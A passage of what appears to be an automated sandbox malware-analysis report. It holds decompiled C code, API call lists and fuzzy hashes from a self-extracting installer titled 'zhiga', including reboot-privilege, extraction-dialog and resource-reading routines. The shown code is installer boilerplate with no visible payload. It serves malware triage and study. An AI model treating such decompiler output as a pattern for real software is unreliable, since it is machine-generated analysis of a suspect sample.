                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                        • String ID: "$"$:$RegServer
                                                                        • API String ID: 1203814774-25366791
                                                                        • Opcode ID: e244199a395362455e24472f07b387b4f8f61a68e40eda09ad8a11c5431458f5
                                                                        • Instruction ID: 4be49d7b08efaafca0050c4b00601d8dd3bff84834d3d27bd47d0278601c40ec
                                                                        • Opcode Fuzzy Hash: e244199a395362455e24472f07b387b4f8f61a68e40eda09ad8a11c5431458f5
                                                                        • Instruction Fuzzy Hash: ABD17D72E08A585FDF35BB388C4C3F53BA1AB16B64F5401EAC486DA191D7748E86BF01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E00F81F90(signed int __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                        				void* _v28;
                                                                        				void* __ebx;
                                                                        				signed int _t13;
                                                                        				int _t21;
                                                                        				void* _t25;
                                                                        				int _t28;
                                                                        				signed char _t30;
                                                                        				void* _t38;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				signed int _t46;
                                                                        
                                                                        				_t41 = __esi;
                                                                        				_t38 = __edi;
                                                                        				_t30 = __ecx;
                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                        					L12:
                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                        						L14:
                                                                        						if( *0xf89a40 != 0) {
                                                                        							_pop(_t30);
                                                                        							_t44 = _t46;
                                                                        							_t13 =  *0xf88004; // 0x7e92e7a6
                                                                        							_v8 = _t13 ^ _t46;
                                                                        							_push(_t38);
                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                        								_v24.PrivilegeCount = 1;
                                                                        								_v12 = 2;
                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                        								CloseHandle(_v28);
                                                                        								_t41 = _t41;
                                                                        								_push(0);
                                                                        								if(_t21 != 0) {
                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                        										_t25 = 1;
                                                                        									} else {
                                                                        										_t37 = 0x4f7;
                                                                        										goto L3;
                                                                        									}
                                                                        								} else {
                                                                        									_t37 = 0x4f6;
                                                                        									goto L4;
                                                                        								}
                                                                        							} else {
                                                                        								_t37 = 0x4f5;
                                                                        								L3:
                                                                        								_push(0);
                                                                        								L4:
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								E00F844B9(0, _t37);
                                                                        								_t25 = 0;
                                                                        							}
                                                                        							_pop(_t40);
                                                                        							return E00F86CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                        						} else {
                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                        							goto L16;
                                                                        						}
                                                                        					} else {
                                                                        						_t37 = 0x522;
                                                                        						_t28 = E00F844B9(0, 0x522, 0xf81140, 0, 0x40, 4);
                                                                        						if(_t28 != 6) {
                                                                        							goto L16;
                                                                        						} else {
                                                                        							goto L14;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					__eax = E00F81EA7(__ecx);
                                                                        					if(__eax != 2) {
                                                                        						L16:
                                                                        						return _t28;
                                                                        					} else {
                                                                        						goto L12;
                                                                        					}
                                                                        				}
                                                                        			}

















                                                                        0x00f81f90
                                                                        0x00f81f90
                                                                        0x00f81f93
                                                                        0x00f81f98
                                                                        0x00f81fa4
                                                                        0x00f81fa7
                                                                        0x00f81fc5
                                                                        0x00f81fcd
                                                                        0x00f81fdb
                                                                        0x00f81ee5
                                                                        0x00f81eea
                                                                        0x00f81ef1
                                                                        0x00f81ef4
                                                                        0x00f81f0c
                                                                        0x00f81f2e
                                                                        0x00f81f3a
                                                                        0x00f81f46
                                                                        0x00f81f4d
                                                                        0x00f81f58
                                                                        0x00f81f60
                                                                        0x00f81f61
                                                                        0x00f81f62
                                                                        0x00f81f75
                                                                        0x00f81f80
                                                                        0x00f81f77
                                                                        0x00f81f77
                                                                        0x00000000
                                                                        0x00f81f77
                                                                        0x00f81f64
                                                                        0x00f81f64
                                                                        0x00000000
                                                                        0x00f81f64
                                                                        0x00f81f0e
                                                                        0x00f81f0e
                                                                        0x00f81f13
                                                                        0x00f81f13
                                                                        0x00f81f14
                                                                        0x00f81f14
                                                                        0x00f81f16
                                                                        0x00f81f17
                                                                        0x00f81f1a
                                                                        0x00f81f1f
                                                                        0x00f81f1f
                                                                        0x00f81f86
                                                                        0x00f81f8f
                                                                        0x00f81fcf
                                                                        0x00f81fd3
                                                                        0x00000000
                                                                        0x00f81fd3
                                                                        0x00f81fa9
                                                                        0x00f81fb4
                                                                        0x00f81fbb
                                                                        0x00f81fc3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f81fc3
                                                                        0x00f81f9a
                                                                        0x00f81f9a
                                                                        0x00f81fa2
                                                                        0x00f81fd9
                                                                        0x00f81fda
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f81fa2

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00F81EFB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F81F02
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00F81FD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2795981589-3733053543
                                                                        • Opcode ID: e6159ec9afa2ad91e34393e62bef4f1d0f91b9fbf7731077404ebe208f17e4ab
                                                                        • Instruction ID: 863b8c94d020b1e36eb1bf2d852f6b3e2791c4a04108dd37feb749b97ee84a52
                                                                        • Opcode Fuzzy Hash: e6159ec9afa2ad91e34393e62bef4f1d0f91b9fbf7731077404ebe208f17e4ab
                                                                        • Instruction Fuzzy Hash: 7A218871F402096AEB207BA19C4EFFB76BCFB85B61F100219FB06D6181D7798842B761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F86CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                        
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				UnhandledExceptionFilter(_a4);
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}



                                                                        0x00f86cf7
                                                                        0x00f86d00
                                                                        0x00f86d19

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F86E26,00F81000), ref: 00F86CF7
                                                                        • UnhandledExceptionFilter.KERNEL32(00F86E26,?,00F86E26,00F81000), ref: 00F86D00
                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00F86E26,00F81000), ref: 00F86D0B
                                                                        • TerminateProcess.KERNEL32(00000000,?,00F86E26,00F81000), ref: 00F86D12
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                        • String ID:
                                                                        • API String ID: 3231755760-0
                                                                        • Opcode ID: 7cbcf4c16f1644d61c82686fedde776e0d3b72fd0fe9b38cdd1c8ebd92896626
                                                                        • Instruction ID: bb9024d3069dc1ac8d5d4addee58cdd0ef5b690df018dd5a5755c719aaf9839b
                                                                        • Opcode Fuzzy Hash: 7cbcf4c16f1644d61c82686fedde776e0d3b72fd0fe9b38cdd1c8ebd92896626
                                                                        • Instruction Fuzzy Hash: 96D0C93200090CBBFB002BE1EC0CAA93F28EB48616F484002F31982021CA364451AF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E00F83210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* __edi;
                                                                        				void* _t6;
                                                                        				void* _t10;
                                                                        				int _t20;
                                                                        				int _t21;
                                                                        				int _t23;
                                                                        				char _t24;
                                                                        				long _t25;
                                                                        				int _t27;
                                                                        				int _t30;
                                                                        				void* _t32;
                                                                        				int _t33;
                                                                        				int _t34;
                                                                        				int _t37;
                                                                        				int _t38;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        				void* _t46;
                                                                        				CHAR* _t49;
                                                                        				void* _t58;
                                                                        				void* _t63;
                                                                        				struct HWND__* _t64;
                                                                        
                                                                        				_t64 = _a4;
                                                                        				_t6 = _a8 - 0x10;
                                                                        				if(_t6 == 0) {
                                                                        					_push(0);
                                                                        					L38:
                                                                        					EndDialog(_t64, ??);
                                                                        					L39:
                                                                        					__eflags = 1;
                                                                        					return 1;
                                                                        				}
                                                                        				_t42 = 1;
                                                                        				_t10 = _t6 - 0x100;
                                                                        				if(_t10 == 0) {
                                                                        					E00F843D0(_t64, GetDesktopWindow());
                                                                        					SetWindowTextA(_t64, "zhiga");
                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                        					__eflags =  *0xf89a40 - _t42; // 0x3
                                                                        					if(__eflags == 0) {
                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                        					}
                                                                        					L36:
                                                                        					return _t42;
                                                                        				}
                                                                        				if(_t10 == _t42) {
                                                                        					_t20 = _a12 - 1;
                                                                        					__eflags = _t20;
                                                                        					if(_t20 == 0) {
                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xf891e4, 0x104);
                                                                        						__eflags = _t21;
                                                                        						if(_t21 == 0) {
                                                                        							L32:
                                                                        							_t58 = 0x4bf;
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							L25:
                                                                        							E00F844B9(_t64, _t58);
                                                                        							goto L39;
                                                                        						}
                                                                        						_t49 = 0xf891e4;
                                                                        						do {
                                                                        							_t23 =  *_t49;
                                                                        							_t49 =  &(_t49[1]);
                                                                        							__eflags = _t23;
                                                                        						} while (_t23 != 0);
                                                                        						__eflags = _t49 - 0xf891e5 - 3;
                                                                        						if(_t49 - 0xf891e5 < 3) {
                                                                        							goto L32;
                                                                        						}
                                                                        						_t24 =  *0xf891e5; // 0x3a
                                                                        						__eflags = _t24 - 0x3a;
                                                                        						if(_t24 == 0x3a) {
                                                                        							L21:
                                                                        							_t25 = GetFileAttributesA(0xf891e4);
                                                                        							__eflags = _t25 - 0xffffffff;
                                                                        							if(_t25 != 0xffffffff) {
                                                                        								L26:
                                                                        								E00F8658A(0xf891e4, 0x104, 0xf81140);
                                                                        								_t27 = E00F858C8(0xf891e4);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 != 0) {
                                                                        									__eflags =  *0xf891e4 - 0x5c;
                                                                        									if( *0xf891e4 != 0x5c) {
                                                                        										L30:
                                                                        										_t30 = E00F8597D(0xf891e4, 1, _t64, 1);
                                                                        										__eflags = _t30;
                                                                        										if(_t30 == 0) {
                                                                        											L35:
                                                                        											_t42 = 1;
                                                                        											__eflags = 1;
                                                                        											goto L36;
                                                                        										}
                                                                        										L31:
                                                                        										_t42 = 1;
                                                                        										EndDialog(_t64, 1);
                                                                        										goto L36;
                                                                        									}
                                                                        									__eflags =  *0xf891e5 - 0x5c;
                                                                        									if( *0xf891e5 == 0x5c) {
                                                                        										goto L31;
                                                                        									}
                                                                        									goto L30;
                                                                        								}
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_t58 = 0x4be;
                                                                        								goto L25;
                                                                        							}
                                                                        							_t32 = E00F844B9(_t64, 0x54a, 0xf891e4, 0, 0x20, 4);
                                                                        							__eflags = _t32 - 6;
                                                                        							if(_t32 != 6) {
                                                                        								goto L35;
                                                                        							}
                                                                        							_t33 = CreateDirectoryA(0xf891e4, 0);
                                                                        							__eflags = _t33;
                                                                        							if(_t33 != 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0xf891e4);
                                                                        							_t58 = 0x4cb;
                                                                        							goto L25;
                                                                        						}
                                                                        						__eflags =  *0xf891e4 - 0x5c;
                                                                        						if( *0xf891e4 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						__eflags = _t24 - 0x5c;
                                                                        						if(_t24 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						goto L21;
                                                                        					}
                                                                        					_t34 = _t20 - 1;
                                                                        					__eflags = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						EndDialog(_t64, 0);
                                                                        						 *0xf89124 = 0x800704c7;
                                                                        						goto L39;
                                                                        					}
                                                                        					__eflags = _t34 != 0x834;
                                                                        					if(_t34 != 0x834) {
                                                                        						goto L36;
                                                                        					}
                                                                        					_t37 = LoadStringA( *0xf89a3c, 0x3e8, 0xf88598, 0x200);
                                                                        					__eflags = _t37;
                                                                        					if(_t37 != 0) {
                                                                        						_t38 = E00F84224(_t64, _t46, _t46);
                                                                        						__eflags = _t38;
                                                                        						if(_t38 == 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xf887a0);
                                                                        						__eflags = _t39;
                                                                        						if(_t39 != 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t63 = 0x4c0;
                                                                        						L9:
                                                                        						E00F844B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						goto L38;
                                                                        					}
                                                                        					_t63 = 0x4b1;
                                                                        					goto L9;
                                                                        				}
                                                                        				return 0;
                                                                        			}

























                                                                        0x00f8321b
                                                                        0x00f8321e
                                                                        0x00f83221
                                                                        0x00f8343c
                                                                        0x00f8343e
                                                                        0x00f8343f
                                                                        0x00f83445
                                                                        0x00f83447
                                                                        0x00000000
                                                                        0x00f83447
                                                                        0x00f83229
                                                                        0x00f8322a
                                                                        0x00f8322f
                                                                        0x00f833ec
                                                                        0x00f833f7
                                                                        0x00f83410
                                                                        0x00f83416
                                                                        0x00f8341d
                                                                        0x00f8342d
                                                                        0x00f8342d
                                                                        0x00f83438
                                                                        0x00000000
                                                                        0x00f83438
                                                                        0x00f83237
                                                                        0x00f83243
                                                                        0x00f83243
                                                                        0x00f83246
                                                                        0x00f832ee
                                                                        0x00f832f4
                                                                        0x00f832f6
                                                                        0x00f833d4
                                                                        0x00f833d6
                                                                        0x00f833db
                                                                        0x00f833dc
                                                                        0x00f833de
                                                                        0x00f833df
                                                                        0x00f83370
                                                                        0x00f83372
                                                                        0x00000000
                                                                        0x00f83372
                                                                        0x00f832fc
                                                                        0x00f83301
                                                                        0x00f83301
                                                                        0x00f83303
                                                                        0x00f83304
                                                                        0x00f83304
                                                                        0x00f8330a
                                                                        0x00f8330d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83313
                                                                        0x00f83318
                                                                        0x00f8331a
                                                                        0x00f83331
                                                                        0x00f83332
                                                                        0x00f8333a
                                                                        0x00f8333d
                                                                        0x00f8337c
                                                                        0x00f83388
                                                                        0x00f8338f
                                                                        0x00f83394
                                                                        0x00f83396
                                                                        0x00f833a4
                                                                        0x00f833ab
                                                                        0x00f833b6
                                                                        0x00f833be
                                                                        0x00f833c3
                                                                        0x00f833c5
                                                                        0x00f83435
                                                                        0x00f83437
                                                                        0x00f83437
                                                                        0x00000000
                                                                        0x00f83437
                                                                        0x00f833c7
                                                                        0x00f833c9
                                                                        0x00f833cc
                                                                        0x00000000
                                                                        0x00f833cc
                                                                        0x00f833ad
                                                                        0x00f833b4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f833b4
                                                                        0x00f83398
                                                                        0x00f83399
                                                                        0x00f8339b
                                                                        0x00f8339c
                                                                        0x00f8339d
                                                                        0x00000000
                                                                        0x00f8339d
                                                                        0x00f8334c
                                                                        0x00f83351
                                                                        0x00f83354
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8335c
                                                                        0x00f83362
                                                                        0x00f83364
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83366
                                                                        0x00f83367
                                                                        0x00f83369
                                                                        0x00f8336a
                                                                        0x00f8336b
                                                                        0x00000000
                                                                        0x00f8336b
                                                                        0x00f8331c
                                                                        0x00f83323
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83329
                                                                        0x00f8332b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8332b
                                                                        0x00f8324c
                                                                        0x00f8324c
                                                                        0x00f8324f
                                                                        0x00f832c8
                                                                        0x00f832ce
                                                                        0x00000000
                                                                        0x00f832ce
                                                                        0x00f83251
                                                                        0x00f83256
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83271
                                                                        0x00f83277
                                                                        0x00f83279
                                                                        0x00f83298
                                                                        0x00f8329d
                                                                        0x00f8329f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f832b0
                                                                        0x00f832b6
                                                                        0x00f832b8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f832be
                                                                        0x00f83280
                                                                        0x00f83289
                                                                        0x00f8328e
                                                                        0x00000000
                                                                        0x00f8328e
                                                                        0x00f8327b
                                                                        0x00000000
                                                                        0x00f8327b
                                                                        0x00000000

                                                                        APIs
                                                                        • LoadStringA.USER32(000003E8,00F88598,00000200), ref: 00F83271
                                                                        • GetDesktopWindow.USER32 ref: 00F833E2
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00F833F7
                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00F83410
                                                                        • GetDlgItem.USER32(?,00000836), ref: 00F83426
                                                                        • EnableWindow.USER32(00000000), ref: 00F8342D
                                                                        • EndDialog.USER32(?,00000000), ref: 00F8343F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$zhiga
                                                                        • API String ID: 2418873061-2157855530
                                                                        • Opcode ID: 474633e13c8ba78efb9db3d44d00790c13dd9ebf4df271fe02faed632663cca6
                                                                        • Instruction ID: 3f338fb9d91bad84f49565cd2430b08ce4a6c8a746bf08647728c35d10361278
                                                                        • Opcode Fuzzy Hash: 474633e13c8ba78efb9db3d44d00790c13dd9ebf4df271fe02faed632663cca6
                                                                        • Instruction Fuzzy Hash: 295146307452457BFB21BB359C8DFFB3A5DDB86F64F144029F646961E0CAB88A02B361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F82CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t13;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				struct HRSRC__* _t31;
                                                                        				intOrPtr _t33;
                                                                        				void* _t43;
                                                                        				void* _t48;
                                                                        				signed int _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				signed int _t67;
                                                                        
                                                                        				_t13 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t13 ^ _t67;
                                                                        				_t65 = 0;
                                                                        				_t66 = __ecx;
                                                                        				_t48 = __edx;
                                                                        				 *0xf89a3c = __ecx;
                                                                        				memset(0xf89140, 0, 0x8fc);
                                                                        				memset(0xf88a20, 0, 0x32c);
                                                                        				memset(0xf888c0, 0, 0x104);
                                                                        				 *0xf893ec = 1;
                                                                        				_t20 = E00F8468F("TITLE", 0xf89154, 0x7f);
                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                        					_t64 = 0x4b1;
                                                                        					goto L32;
                                                                        				} else {
                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                        					 *0xf8858c = _t27;
                                                                        					SetEvent(_t27);
                                                                        					_t64 = 0xf89a34;
                                                                        					if(E00F8468F("EXTRACTOPT", 0xf89a34, 4) != 0) {
                                                                        						if(( *0xf89a34 & 0x000000c0) == 0) {
                                                                        							L12:
                                                                        							 *0xf89120 =  *0xf89120 & _t65;
                                                                        							if(E00F85C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                        								if( *0xf88a3a == 0) {
                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                        									if(_t31 != 0) {
                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                        									}
                                                                        									if( *0xf88184 != 0) {
                                                                        										__imp__#17();
                                                                        									}
                                                                        									if( *0xf88a24 == 0) {
                                                                        										_t57 = _t65;
                                                                        										if(E00F836EE(_t65) == 0) {
                                                                        											goto L33;
                                                                        										} else {
                                                                        											_t33 =  *0xf89a40; // 0x3
                                                                        											_t48 = 1;
                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                        												if(( *0xf89a34 & 0x00000100) == 0 || ( *0xf88a38 & 0x00000001) != 0 || E00F818A3(_t64, _t66) != 0) {
                                                                        													goto L30;
                                                                        												} else {
                                                                        													_t64 = 0x7d6;
                                                                        													if(E00F86517(_t57, 0x7d6, _t34, E00F819E0, 0x547, 0x83e) != 0x83d) {
                                                                        														goto L33;
                                                                        													} else {
                                                                        														goto L30;
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												L30:
                                                                        												_t23 = _t48;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_t23 = 1;
                                                                        									}
                                                                        								} else {
                                                                        									E00F82390(0xf88a3a);
                                                                        									goto L33;
                                                                        								}
                                                                        							} else {
                                                                        								_t64 = 0x520;
                                                                        								L32:
                                                                        								E00F844B9(0, _t64, 0, 0, 0x10, 0);
                                                                        								goto L33;
                                                                        							}
                                                                        						} else {
                                                                        							_t64 =  &_v268;
                                                                        							if(E00F8468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                        								 *0xf88588 = _t43;
                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									if(( *0xf89a34 & 0x00000080) == 0) {
                                                                        										_t64 = 0x524;
                                                                        										if(E00F844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                        											goto L12;
                                                                        										} else {
                                                                        											goto L11;
                                                                        										}
                                                                        									} else {
                                                                        										_t64 = 0x54b;
                                                                        										E00F844B9(0, 0x54b, "zhiga", 0, 0x10, 0);
                                                                        										L11:
                                                                        										CloseHandle( *0xf88588);
                                                                        										 *0xf89124 = 0x800700b7;
                                                                        										goto L33;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						L3:
                                                                        						_t64 = 0x4b1;
                                                                        						E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						 *0xf89124 = 0x80070714;
                                                                        						L33:
                                                                        						_t23 = 0;
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                        			}



















                                                                        0x00f82cb5
                                                                        0x00f82cbc
                                                                        0x00f82cc7
                                                                        0x00f82cc9
                                                                        0x00f82cd1
                                                                        0x00f82cd3
                                                                        0x00f82cd9
                                                                        0x00f82ce9
                                                                        0x00f82cf9
                                                                        0x00f82d0e
                                                                        0x00f82d15
                                                                        0x00f82d1c
                                                                        0x00f82ef3
                                                                        0x00000000
                                                                        0x00f82d2d
                                                                        0x00f82d34
                                                                        0x00f82d3b
                                                                        0x00f82d40
                                                                        0x00f82d48
                                                                        0x00f82d59
                                                                        0x00f82d84
                                                                        0x00f82e1f
                                                                        0x00f82e1f
                                                                        0x00f82e2e
                                                                        0x00f82e41
                                                                        0x00f82e5a
                                                                        0x00f82e62
                                                                        0x00f82e6c
                                                                        0x00f82e6c
                                                                        0x00f82e75
                                                                        0x00f82e77
                                                                        0x00f82e77
                                                                        0x00f82e84
                                                                        0x00f82e8b
                                                                        0x00f82e94
                                                                        0x00000000
                                                                        0x00f82e96
                                                                        0x00f82e96
                                                                        0x00f82e9e
                                                                        0x00f82ea2
                                                                        0x00f82eba
                                                                        0x00000000
                                                                        0x00f82ece
                                                                        0x00f82ede
                                                                        0x00f82eed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82eed
                                                                        0x00f82eef
                                                                        0x00f82eef
                                                                        0x00f82eef
                                                                        0x00f82eef
                                                                        0x00f82ea2
                                                                        0x00f82e86
                                                                        0x00f82e88
                                                                        0x00f82e88
                                                                        0x00f82e43
                                                                        0x00f82e48
                                                                        0x00000000
                                                                        0x00f82e48
                                                                        0x00f82e30
                                                                        0x00f82e30
                                                                        0x00f82ef8
                                                                        0x00f82f01
                                                                        0x00000000
                                                                        0x00f82f01
                                                                        0x00f82d8a
                                                                        0x00f82d8f
                                                                        0x00f82da1
                                                                        0x00000000
                                                                        0x00f82da3
                                                                        0x00f82dae
                                                                        0x00f82db4
                                                                        0x00f82dbb
                                                                        0x00000000
                                                                        0x00f82dca
                                                                        0x00f82dd3
                                                                        0x00f82df5
                                                                        0x00f82e02
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82dd5
                                                                        0x00f82dde
                                                                        0x00f82de3
                                                                        0x00f82e04
                                                                        0x00f82e0a
                                                                        0x00f82e10
                                                                        0x00000000
                                                                        0x00f82e10
                                                                        0x00f82dd3
                                                                        0x00f82dbb
                                                                        0x00f82da1
                                                                        0x00f82d5b
                                                                        0x00f82d5b
                                                                        0x00f82d5d
                                                                        0x00f82d69
                                                                        0x00f82d6e
                                                                        0x00f82f06
                                                                        0x00f82f06
                                                                        0x00f82f06
                                                                        0x00f82d59
                                                                        0x00f82f18

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F82CD9
                                                                        • memset.MSVCRT ref: 00F82CE9
                                                                        • memset.MSVCRT ref: 00F82CF9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
